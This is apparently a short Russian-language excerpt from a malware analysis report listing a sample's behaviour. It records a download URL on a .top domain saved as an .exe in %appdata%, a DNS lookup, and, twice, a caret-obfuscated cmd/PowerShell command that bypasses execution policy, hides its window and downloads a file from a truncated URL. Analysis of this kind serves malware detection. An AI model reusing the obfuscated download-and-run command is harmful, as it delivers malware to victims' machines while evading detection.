Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poW^eR^Sh^eLl.^e^Xe -Ex^Ec^UtiO^n^Po^licy byp^aS^S^ ^-^No^P^ROf^i^Le^ -^w^iND^ow^sT^yl^e hIDdeN (^ne^w^-^O^BJecT^ syST^e^m.N^Et.^weBc^lIEn^T)^.^D^O^WnlO^a^dF^i^LE(^'http://...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "poW^eR^Sh^eLl.^e^Xe -Ex^Ec^UtiO^n^Po^licy byp^aS^S^ ^-^No^P^ROf^i^Le^ -^w^iND^ow^sT^yl^e hIDdeN (^ne^w^-^O^BJecT^ syST^e^m.N^Et.^weBc^lIEn^T)^.^D^O^WnlO^a^dF^i^LE(^'http://...' (со скрытым окном)